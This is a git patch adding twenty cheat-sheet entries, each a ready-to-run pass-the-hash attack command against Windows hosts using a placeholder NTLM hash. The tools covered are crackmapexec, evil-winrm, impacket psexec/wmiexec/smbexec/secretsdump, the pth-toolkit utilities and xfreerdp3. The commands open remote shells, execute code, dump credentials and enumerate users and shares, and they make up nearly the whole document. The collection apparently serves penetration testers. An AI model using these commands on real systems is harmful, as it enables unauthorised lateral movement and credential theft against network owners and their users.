From 45ec5a7d8b9f610de4de2628083a8cb44d13b3e9 Mon Sep 17 00:00:00 2001 From: Dipak Panchal <31427462+dipakpanchal05@users.noreply.github.com> Date: Wed, 13 Aug 2025 15:55:58 +0530 Subject: [PATCH] Pass the hash commands [#Hash] Updated commands for pass the hash --- _wadcoms/crackmapexec.md | 29 +++++++++++++++++++++++++++++ _wadcoms/evil-winrm.md | 31 +++++++++++++++++++++++++++++++ _wadcoms/impacket-atexec.md | 28 ++++++++++++++++++++++++++++ _wadcoms/impacket-lookupsid.md | 29 +++++++++++++++++++++++++++++ _wadcoms/impacket-psexec.md | 32 ++++++++++++++++++++++++++++++++ _wadcoms/impacket-rpcdump.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/impacket-samrdump.md | 28 ++++++++++++++++++++++++++++ _wadcoms/impacket-secretsdump.md | 29 +++++++++++++++++++++++++++++ _wadcoms/impacket-smbclient.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/impacket-smbexec.md | 31 +++++++++++++++++++++++++++++++ _wadcoms/impacket-wmiexec.md | 31 +++++++++++++++++++++++++++++++ _wadcoms/pth-curl.md | 28 ++++++++++++++++++++++++++++ _wadcoms/pth-net.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/pth-rpcclient.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/pth-smbclient.md | 31 +++++++++++++++++++++++++++++++ _wadcoms/pth-sqsh.md | 29 +++++++++++++++++++++++++++++ _wadcoms/pth-winexe.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/pth-wmic.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/pth-wmis.md | 30 ++++++++++++++++++++++++++++++ _wadcoms/xfreerdp3.md | 29 +++++++++++++++++++++++++++++ 20 files changed, 595 insertions(+) create mode 100644 _wadcoms/crackmapexec.md create mode 100644 _wadcoms/evil-winrm.md create mode 100644 _wadcoms/impacket-atexec.md create mode 100644 _wadcoms/impacket-lookupsid.md create mode 100644 _wadcoms/impacket-psexec.md create mode 100644 _wadcoms/impacket-rpcdump.md create mode 100644 _wadcoms/impacket-samrdump.md create mode 100644 _wadcoms/impacket-secretsdump.md create mode 100644 _wadcoms/impacket-smbclient.md create mode 100644 _wadcoms/impacket-smbexec.md create mode 100644 _wadcoms/impacket-wmiexec.md create mode 100644 _wadcoms/pth-curl.md create mode 100644 _wadcoms/pth-net.md create mode 100644 _wadcoms/pth-rpcclient.md create mode 100644 _wadcoms/pth-smbclient.md create mode 100644 _wadcoms/pth-sqsh.md create mode 100644 _wadcoms/pth-winexe.md create mode 100644 _wadcoms/pth-wmic.md create mode 100644 _wadcoms/pth-wmis.md create mode 100644 _wadcoms/xfreerdp3.md diff --git a/_wadcoms/crackmapexec.md b/_wadcoms/crackmapexec.md new file mode 100644 index 0000000..20f848c --- /dev/null +++ b/_wadcoms/crackmapexec.md @@ -0,0 +1,29 @@ +--- +description: Use CrackMapExec to perform SMB authentication with NTLM Pass-the-Hash against a subnet, enumerating SMB shares or verifying credentials. + +Command Reference: + Target IP: 10.10.10.1/24 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + crackmapexec smb 10.10.10.1/24 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://github.com/byt3bl33d3r/CrackMapExec + - https://www.ired.team/offensive-security/lateral-movement/using-crackmapexec +--- diff --git a/_wadcoms/evil-winrm.md b/_wadcoms/evil-winrm.md new file mode 100644 index 0000000..520e580 --- /dev/null +++ b/_wadcoms/evil-winrm.md @@ -0,0 +1,31 @@ +--- +description: Authenticate to a remote Windows host over WinRM using NTLM Pass-the-Hash and obtain an interactive PowerShell session. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + evil-winrm -i 10.10.10.1 -u john -H 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 + +items: + - Hash + - Shell + - PowerShell + +services: + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + +references: + - https://github.com/Hackplayers/evil-winrm + - https://book.hacktricks.xyz/windows-hardening/evil-winrm + - https://docs.microsoft.com/en-us/windows/win32/winrm/portal +--- diff --git a/_wadcoms/impacket-atexec.md b/_wadcoms/impacket-atexec.md new file mode 100644 index 0000000..ea1d8dd --- /dev/null +++ b/_wadcoms/impacket-atexec.md @@ -0,0 +1,28 @@ +--- +description: Schedule a task remotely over SMB using Impacket's atexec with NTLM Pass-the-Hash to execute a command. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-atexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 "whoami" + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + +references: + - https://github.com/fortra/impacket +--- diff --git a/_wadcoms/impacket-lookupsid.md b/_wadcoms/impacket-lookupsid.md new file mode 100644 index 0000000..3d7e9e9 --- /dev/null +++ b/_wadcoms/impacket-lookupsid.md @@ -0,0 +1,29 @@ +--- +description: Enumerate domain SIDs and associated usernames using Impacket's lookupsid.py with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-lookupsid -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1 + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://github.com/fortra/impacket + - https://attack.mitre.org/techniques/T1087/ +--- diff --git a/_wadcoms/impacket-psexec.md b/_wadcoms/impacket-psexec.md new file mode 100644 index 0000000..b4706d6 --- /dev/null +++ b/_wadcoms/impacket-psexec.md @@ -0,0 +1,32 @@ +--- +description: Execute commands on a remote Windows host as Administrator over SMB using Impacket's psexec with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-psexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 + +items: + - Hash + - Shell + - Powershell + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + +references: + - https://github.com/fortra/impacket + - https://www.hackingarticles.in/a-little-guide-to-impacket/ + - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec +--- diff --git a/_wadcoms/impacket-rpcdump.md b/_wadcoms/impacket-rpcdump.md new file mode 100644 index 0000000..4822953 --- /dev/null +++ b/_wadcoms/impacket-rpcdump.md @@ -0,0 +1,30 @@ +--- +description: Enumerate RPC services on a remote Windows machine using Impacket's rpcdump with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-rpcdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1 + +items: + - Hash + - Enumeration + +services: + - RPC + - NTLM + +OS: + - Windows + +attack_types: + - Pass-the-Hash + - Enumeration + +references: + - https://github.com/fortra/impacket +--- diff --git a/_wadcoms/impacket-samrdump.md b/_wadcoms/impacket-samrdump.md new file mode 100644 index 0000000..4f72757 --- /dev/null +++ b/_wadcoms/impacket-samrdump.md @@ -0,0 +1,28 @@ +--- +description: Enumerate user accounts and groups from the SAM database over RPC using Impacket's samrdump with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-samrdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1 + +items: + - Hash + +services: + - RPC + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://github.com/fortra/impacket +--- diff --git a/_wadcoms/impacket-secretsdump.md b/_wadcoms/impacket-secretsdump.md new file mode 100644 index 0000000..d468d93 --- /dev/null +++ b/_wadcoms/impacket-secretsdump.md @@ -0,0 +1,29 @@ +--- +description: Dump password hashes and secrets from a remote Windows machine using Impacket's secretsdump with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-secretsdump -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + - PrivEsc + +references: + - https://github.com/fortra/impacket +--- diff --git a/_wadcoms/impacket-smbclient.md b/_wadcoms/impacket-smbclient.md new file mode 100644 index 0000000..e7d690d --- /dev/null +++ b/_wadcoms/impacket-smbclient.md @@ -0,0 +1,30 @@ +--- +description: Use Impacket's smbclient to connect to SMB shares on a Windows host using NTLM Pass-the-Hash authentication. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-smbclient -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 test.local/john@10.10.10.1 + +items: + - Hash + - SMB + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://github.com/fortra/impacket + - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview +--- diff --git a/_wadcoms/impacket-smbexec.md b/_wadcoms/impacket-smbexec.md new file mode 100644 index 0000000..0106e18 --- /dev/null +++ b/_wadcoms/impacket-smbexec.md @@ -0,0 +1,31 @@ +--- +description: Execute commands remotely over SMB using Impacket's smbexec with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-smbexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 + +items: + - Hash + - Shell + - PowerShell + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + +references: + - https://github.com/fortra/impacket + - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview +--- diff --git a/_wadcoms/impacket-wmiexec.md b/_wadcoms/impacket-wmiexec.md new file mode 100644 index 0000000..3709e99 --- /dev/null +++ b/_wadcoms/impacket-wmiexec.md @@ -0,0 +1,31 @@ +--- +description: Execute commands remotely over WMI on a Windows host using Impacket's wmiexec with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + impacket-wmiexec -hashes 00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 john@10.10.10.1 + +items: + - Hash + - Shell + - PowerShell + +services: + - WMI + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - Persistence + +references: + - https://github.com/fortra/impacket +--- diff --git a/_wadcoms/pth-curl.md b/_wadcoms/pth-curl.md new file mode 100644 index 0000000..cd8bdde --- /dev/null +++ b/_wadcoms/pth-curl.md @@ -0,0 +1,28 @@ +--- +description: Download files from a remote server using curl with NTLM Pass-the-Hash authentication. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-curl --ntlm -u john:580B16D486D8D2CAFA00B314D41FA396 http://10.10.10.1/secret.txt + +items: + - Hash + +services: + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://curl.se/docs/manual.html + - https://github.com/byt3bl33d3r/pth-toolkit +--- diff --git a/_wadcoms/pth-net.md b/_wadcoms/pth-net.md new file mode 100644 index 0000000..07b2f4f --- /dev/null +++ b/_wadcoms/pth-net.md @@ -0,0 +1,30 @@ +--- +description: Enumerate SMB shares on a remote machine using the net rpc share list command with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-net rpc share list -U 'test.local\john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396' -S 10.10.10.1 + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://www.samba.org/samba/docs/current/man-html/net.8.html + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview +--- diff --git a/_wadcoms/pth-rpcclient.md b/_wadcoms/pth-rpcclient.md new file mode 100644 index 0000000..e840e4f --- /dev/null +++ b/_wadcoms/pth-rpcclient.md @@ -0,0 +1,30 @@ +--- +description: Interact with RPC services on a remote Windows machine using rpcclient with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-rpcclient -U test.local/john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1 + +items: + - Hash + +services: + - RPC + - NTLM + +OS: + - Windows + +attack_types: + - Enumeration + +references: + - https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page +--- diff --git a/_wadcoms/pth-smbclient.md b/_wadcoms/pth-smbclient.md new file mode 100644 index 0000000..c537242 --- /dev/null +++ b/_wadcoms/pth-smbclient.md @@ -0,0 +1,31 @@ +--- +description: Connect to an SMB share on a remote Windows host using smbclient with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: test.local + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-smbclient -U test.local/john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1/C$ + +items: + - Hash + +services: + - SMB + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - Persistence + +references: + - https://www.samba.org/samba/docs/current/man-html/smbclient.1.html + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview +--- diff --git a/_wadcoms/pth-sqsh.md b/_wadcoms/pth-sqsh.md new file mode 100644 index 0000000..bd42169 --- /dev/null +++ b/_wadcoms/pth-sqsh.md @@ -0,0 +1,29 @@ +--- +description: Connect to a remote SQL Server instance using sqsh with NTLM Pass-the-Hash authentication. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-sqsh -S 10.10.10.1 -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 + +items: + - Hash + +services: + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + +references: + - http://www.sqsh.org/ + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/sql/sql-server/?view=sql-server-ver16 +--- diff --git a/_wadcoms/pth-winexe.md b/_wadcoms/pth-winexe.md new file mode 100644 index 0000000..40412b8 --- /dev/null +++ b/_wadcoms/pth-winexe.md @@ -0,0 +1,30 @@ +--- +description: Execute commands remotely over SMB using winexe with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-winexe -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 //10.10.10.1 cmd.exe + +items: + - Hash + +services: + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - Persistence + +references: + - https://github.com/ahmedkhlief/winexe + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview +--- diff --git a/_wadcoms/pth-wmic.md b/_wadcoms/pth-wmic.md new file mode 100644 index 0000000..ca61e07 --- /dev/null +++ b/_wadcoms/pth-wmic.md @@ -0,0 +1,30 @@ +--- +description: Execute processes remotely over WMI using wmic with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-wmic -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 --namespace //root/cimv2 --node 10.10.10.1 process call create "cmd.exe /c whoami" + +items: + - Hash + +services: + - WMI + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - Persistence + +references: + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page +--- diff --git a/_wadcoms/pth-wmis.md b/_wadcoms/pth-wmis.md new file mode 100644 index 0000000..197ce71 --- /dev/null +++ b/_wadcoms/pth-wmis.md @@ -0,0 +1,30 @@ +--- +description: Execute commands remotely over WMI using wmis with NTLM Pass-the-Hash. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + pth-wmis -U john%00000000000000000000000000000000:580B16D486D8D2CAFA00B314D41FA396 10.10.10.1 + +items: + - Hash + +services: + - WMI + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - Persistence + +references: + - https://github.com/byt3bl33d3r/pth-toolkit + - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page +--- diff --git a/_wadcoms/xfreerdp3.md b/_wadcoms/xfreerdp3.md new file mode 100644 index 0000000..fe3bed2 --- /dev/null +++ b/_wadcoms/xfreerdp3.md @@ -0,0 +1,29 @@ +--- +description: Connect to a remote Windows desktop via RDP using NTLM Pass-the-Hash authentication, bypassing certificate warnings. + +Command Reference: + Target IP: 10.10.10.1 + Domain: N/A + Username: john + Hash: 580B16D486D8D2CAFA00B314D41FA396 (NTLM hash) + +command: | + xfreerdp3 /v:10.10.10.1 /u:john /pth:580B16D486D8D2CAFA00B314D41FA396 /cert:ignore + +items: + - Hash + +services: + - NTLM + +OS: + - Windows + +attack_types: + - Exploitation + - PrivEsc + +references: + - https://github.com/FreeRDP/FreeRDP + - https://www.kali.org/tools/freerdp3/#xfreerdp3 +---